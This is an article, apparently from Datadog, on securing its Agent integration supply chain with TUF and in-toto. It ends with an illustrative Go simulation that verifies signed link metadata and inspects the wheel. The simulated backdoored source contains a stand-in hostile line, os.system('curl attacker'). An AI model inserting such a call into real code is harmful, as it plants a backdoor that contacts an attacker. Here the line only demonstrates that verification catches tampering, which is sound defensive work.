The Datadog Agent consists of integrations that collect data from potentially hundreds of software applications. To the best of our knowledge, we are the first in the industry to discuss how to build such a compromise-resilient CI/CD system: that is, we protect the authenticity and integrity of Agent integrations from the moment our developers commit source code to the point that our end users install them as packages.
With this in mind, we describe the following goals for a defender. Publish new integrations independently of Agent releases: coupling the release of integrations with that of the Agent may delay the release of critical feature enhancements and improvements. We also want the ability to build automatically. The challenge lies in ensuring end-to-end security when using automation to build, sign, and publish integrations.
The CI/CD system uses TUF to sign new integrations, and in-toto ensures that the CI/CD system packaged exactly the source code that one of our developers signed. In in-toto terms, a step may be, for example, a developer writing source code or a CI/CD job packaging this source code into a zip file. A functionary is uniquely identified by the public key they use to sign a piece of link metadata, which serves as proof that a step in the supply chain was performed. Every Yubikey that holds a signing key requires a secret user PIN to unlock it.
In our supply chain, the CI/CD system must receive the source code from the previous step, along with previously built Python wheels. The next CI/CD step must receive exactly the same wheels as the previous step. Finally, the Datadog Agent downloads and extracts files from one of these wheels to check that they correspond to the same Python source code and YAML configuration files that our developers signed. A verifier can also download the source and make a build of its own; this can be used to, e.g., verify against the output of the docker build.
When a client such as the Datadog Agent puts the signed metadata together, it can check whether a package was produced by following this prescribed sequence of steps, and only by the designated parties. The key point is that this supply chain provides end-to-end verification: it ensures the Agent only trusts wheels containing source code that was released by Datadog developers. Additional metadata, beyond layout and link metadata, can be supplied alongside target files to verify other properties of the supply chain (e.g., was a code review policy applied?) when inspecting the final product.
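The following Go program is an added illustration of the layout/link verification described above; it is not code from the original post, from the in-toto project, or from Datadog's pipeline. A developer key signs link metadata for a source-tagging step, a CI/CD key signs links for a wheel-building and a wheel-signing step, and a client checks that each link is validly signed by the functionary the layout designates and that each step's materials are exactly the products the previous step recorded, then extracts the wheel and compares its files with the digests the developer signed. The step names (tag, wheels-builder, wheels-signer), the JSON bundle standing in for a wheel, the sample files and the simplified MATCH rule are assumptions; real in-toto layouts carry artifact rules and use a different metadata encoding, and the TUF signing of the published wheel is not modelled. It uses only the Go standard library (Ed25519 from crypto/ed25519).

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"fmt"
	"reflect"
)

// Link is simplified in-toto link metadata: artifacts (path -> hex SHA-256) a step consumed and produced.
type Link struct {
	Step      string            `json:"step"`
	Materials map[string]string `json:"materials"`
	Products  map[string]string `json:"products"`
	Sig       []byte            `json:"-"` // functionary's Ed25519 signature over the JSON of the fields above
}

// Step is one layout entry: the key that must sign the step's link, and the earlier step whose products its materials must equal.
type Step struct {
	Name, MatchFrom string
	Functionary     ed25519.PublicKey
}

// digest and digests hash artifacts the way link metadata records them (hex SHA-256).
func digest(b []byte) string { return fmt.Sprintf("%x", sha256.Sum256(b)) }
func digests(files map[string][]byte) map[string]string {
	d := map[string]string{}
	for p, c := range files {
		d[p] = digest(c)
	}
	return d
}

func sign(priv ed25519.PrivateKey, l Link) Link {
	b, _ := json.Marshal(l) // map keys are emitted sorted, so the encoding is canonical
	l.Sig = ed25519.Sign(priv, b)
	return l
}

// VerifyChain is the client's check: every step has a link validly signed by its designated functionary
// (a missing link is the zero value and fails), and its materials equal the products of the step it must match.
func VerifyChain(layout []Step, links map[string]Link) error {
	for _, st := range layout {
		l := links[st.Name]
		if b, _ := json.Marshal(l); !ed25519.Verify(st.Functionary, b, l.Sig) {
			return fmt.Errorf("%s: no link metadata validly signed by the designated functionary", st.Name)
		}
		if st.MatchFrom != "" && !reflect.DeepEqual(links[st.MatchFrom].Products, l.Materials) {
			return fmt.Errorf("%s: materials differ from the products of %s", st.Name, st.MatchFrom)
		}
	}
	return nil
}

// InspectWheel is the final inspection: extract the wheel (modelled as a JSON bundle of files) and compare every file with the signed digests.
func InspectWheel(wheel []byte, signedFiles map[string]string) error {
	var files map[string][]byte
	if err := json.Unmarshal(wheel, &files); err != nil {
		return err
	}
	if !reflect.DeepEqual(digests(files), signedFiles) {
		return fmt.Errorf("wheel contents differ from the source the developer signed")
	}
	return nil
}

// RunSupplyChain simulates tag -> wheels-builder -> wheels-signer -> Agent inspection for one CI behaviour.
func RunSupplyChain(mode string) error {
	devPub, devPriv, _ := ed25519.GenerateKey(rand.Reader) // developer key (Yubikey-held in practice)
	ciPub, ciPriv, _ := ed25519.GenerateKey(rand.Reader)   // CI/CD job key
	// Constructed sample integration; not real Datadog files.
	src := map[string][]byte{"check.py": []byte("def check():\n    return 'ok'\n"), "conf.yaml": []byte("instances:\n  - {}\n")}
	built, recorded := src, digests(src) // what CI packages, and what its link claims it consumed
	if mode != "honest" { // a compromised CI swaps in backdoored source
		built = map[string][]byte{"check.py": []byte("import os\nos.system('curl attacker')\n"), "conf.yaml": src["conf.yaml"]}
	}
	if mode == "recorded" { // ...and records that truthfully; in mode "lied" its link keeps the signed digests
		recorded = digests(built)
	}
	wheel, _ := json.Marshal(built)
	whl := map[string]string{"integration.whl": digest(wheel)}
	links := map[string]Link{
		"tag":            sign(devPriv, Link{Step: "tag", Products: digests(src)}),
		"wheels-builder": sign(ciPriv, Link{Step: "wheels-builder", Materials: recorded, Products: whl}),
		"wheels-signer":  sign(ciPriv, Link{Step: "wheels-signer", Materials: whl, Products: whl}),
	}
	layout := []Step{{"tag", "", devPub}, {"wheels-builder", "tag", ciPub}, {"wheels-signer", "wheels-builder", ciPub}}
	if err := VerifyChain(layout, links); err != nil {
		return err
	}
	return InspectWheel(wheel, links["tag"].Products)
}

func main() {
	fmt.Println(RunSupplyChain("honest"), RunSupplyChain("recorded"), RunSupplyChain("lied"))
}
```

The three modes show why both halves of the check matter. In mode "recorded" the CI job packages different source and records what it really consumed, so the builder step's materials no longer match the tag step's products and VerifyChain rejects the chain. In mode "lied" a compromised CI job packages different source but copies the developer's signed digests into its link; the link chain is internally consistent and VerifyChain passes, and only the final inspection of the extracted wheel against the signed source catches the substitution. A link signed by any key other than the one the layout designates for that step, or a missing link, is rejected before artifact matching is even attempted.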